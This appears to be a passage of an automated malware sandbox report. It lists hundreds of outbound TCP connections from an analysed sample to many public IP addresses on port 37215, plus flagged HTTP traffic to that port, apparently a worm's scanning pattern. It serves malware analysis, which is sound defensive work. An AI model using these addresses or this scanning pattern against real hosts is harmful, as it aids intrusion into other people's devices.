                  Source: global trafficTCP traffic: 41.138.253.48 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.116.42.62 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.55.221.244 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.117.48.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.139.37.36 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.229.46.52 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.215.10.59 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.121.84.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.109.120.209 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.246.74.58 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.172.163.162 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.117.125.36 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 123.9.212.57 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.30.40.152 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.65.101.179 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.139.228.238 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.255.175.142 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.191.64.228 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.151.212.208 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.122.47.50 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.252.69.113 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 167.37.234.0 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.123.82.36 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.38.89.252 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.180.103.156 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 43.140.62.166 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.47.174.149 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 185.50.215.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.226.110.213 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 104.185.119.100 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.190.171.218 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.156.64.155 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.6.115.9 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.117.205.44 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.29.170.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 179.115.110.10 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.248.120.158 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.146.71.87 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.68.87.77 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.118.109.173 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.193.139.88 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 171.158.71.242 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.97.58.224 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.150.205.202 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.92.211.203 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.8.43.206 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 108.58.117.27 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.147.155.17 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.10.100.12 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.239.99.16 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 113.6.154.173 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.247.221.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.65.240.174 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.183.22.19 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.125.154.9 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.15.250.58 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.242.162.198 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.44.73.207 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.77.105.34 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.203.105.72 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.87.222.77 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.186.10.39 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.86.73.16 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.205.134.89 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.231.146.27 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.106.126.248 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 101.189.142.122 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.207.197.88 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 202.67.100.45 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.28.133.127 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 184.220.209.78 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.165.15.186 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.144.17.231 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 183.104.2.21 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.66.92.231 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.208.76.247 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.126.108.231 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.133.30.24 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.19.85.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.187.182.162 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 61.207.156.53 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 100.186.240.85 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.165.121.237 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.103.151.98 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.24.88.228 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.205.193.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.202.85.61 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.232.9.249 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.191.208.48 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.109.211.30 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.196.145.206 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 169.177.66.52 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 106.79.47.27 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.224.162.178 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.2.161.170 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 110.254.158.157 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.220.234.44 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.105.180.3 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.15.212.194 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.203.238.242 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 149.115.82.72 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.193.107.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.120.227.28 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.175.252.35 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.105.100.94 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.43.127.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 36.89.146.41 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.210.91.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.139.83.196 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.43.125.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.153.20.238 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.174.28.233 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.121.236.240 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.103.222.125 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 70.249.198.141 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.212.255.216 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 135.102.47.9 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.155.106.175 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.66.21.41 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 73.87.172.88 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.103.243.190 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 181.3.84.43 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.159.15.77 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.110.33.109 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.234.248.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.220.47.15 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 196.139.253.65 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.68.174.140 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.244.55.135 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.236.202.109 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.104.31.205 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 181.43.141.40 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.15.97.95 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.68.197.32 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.88.194.86 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.89.62.15 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.51.114.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.81.140.211 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.11.110.182 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.205.233.100 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.37.77.92 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 207.127.161.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.77.199.212 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.155.54.19 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.19.106.33 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.74.124.140 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.19.169.175 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.193.60.226 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.193.173.137 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.200.143.80 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.121.167.190 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.249.192.241 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.179.81.118 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.100.217.152 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.126.238.182 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.140.212.130 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 14.45.218.233 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.82.138.88 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.137.142.220 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.145.183.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.157.177.128 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.209.226.226 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 53.66.170.46 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.39.137.30 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 39.48.241.187 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.0.124.228 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 161.202.167.186 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 73.178.7.118 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.63.68.209 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 98.241.30.48 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.0.177.204 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.12.239.23 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.144.99.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 115.138.220.111 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.208.157.109 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 54.241.163.57 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.111.181.191 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 187.176.48.242 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.204.188.72 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.66.95.76 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.207.229.119 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.127.248.106 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.244.131.193 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.221.55.66 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.122.222.123 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 217.215.170.113 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 18.143.174.106 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.10.190.111 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.70.180.111 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.227.31.245 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 111.98.104.242 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.42.220.67 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.1.72.175 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 46.200.188.25 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.120.66.18 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.90.58.41 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.236.174.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.163.9.81 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.159.153.236 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.111.58.100 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.99.193.181 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 218.152.125.146 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 209.98.203.126 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.163.251.14 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.174.63.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.204.33.62 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.27.14.55 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.148.168.209 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.255.222.217 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.25.245.231 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 162.51.35.228 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 191.77.215.221 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.152.123.183 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.2.246.5 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.255.200.41 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.98.114.203 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.8.76.26 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.173.248.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.150.43.142 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.86.153.3 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 168.248.59.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 222.131.253.191 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.149.31.236 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 148.114.118.244 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.124.30.74 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 135.133.247.43 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.67.177.196 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.0.235.248 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.185.101.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.37.33.8 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.25.18.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.151.169.133 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.3.221.143 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.157.45.148 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.63.34.29 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.10.55.238 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.163.247.168 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.189.212.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 132.190.120.63 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 106.204.78.73 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 193.178.245.59 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.66.83.62 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 135.248.31.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.18.91.146 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.182.210.198 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.160.98.226 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.253.121.55 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.62.129.131 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 67.173.95.69 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.190.208.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 133.249.254.39 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.82.111.208 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.127.225.235 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 184.124.238.137 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.46.158.67 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.102.198.190 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.183.209.97 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.247.83.126 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.112.115.182 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.239.98.215 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.30.54.237 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.38.220.173 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.167.100.69 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.221.44.54 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.76.95.23 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 106.56.6.190 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.37.231.78 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.139.234.44 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.237.123.44 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.199.22.193 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 126.240.113.29 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.180.198.239 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.53.213.71 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.119.67.151 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.217.152.128 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.35.84.171 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.14.156.222 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.186.140.174 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.80.209.117 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.158.58.163 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 164.16.255.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 112.80.144.47 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.190.236.205 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.175.220.214 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.36.120.34 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.112.47.233 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 5.97.26.130 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.207.159.2 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 163.220.137.24 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.230.94.116 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 93.147.120.212 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.56.136.161 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.60.208.73 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 72.228.69.157 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.146.63.152 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.201.211.159 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 93.145.1.205 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.89.173.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 42.152.20.241 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.248.33.158 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.209.191.216 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.201.154.205 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.43.31.28 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 201.165.179.208 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.170.219.19 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.85.149.56 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.108.181.225 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.86.219.202 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.140.67.184 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.141.214.50 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.1.236.144 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 120.29.210.143 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.151.115.26 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 206.0.159.238 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.222.239.253 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.176.239.192 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.18.238.191 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 119.200.47.168 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.103.22.213 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.6.141.55 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.99.32.154 ports 1,2,3,5,7,37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56606 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34286 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48538 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53482 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40950 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34830 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53722 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53434 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45890 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36750 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60710 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37416 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60778 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39058 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35686 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43232 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54482 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43560 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59060 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55978 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34046 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44368 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50638 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44522 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42672 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43872 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45960 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60354 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44952 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48924 -> 37215
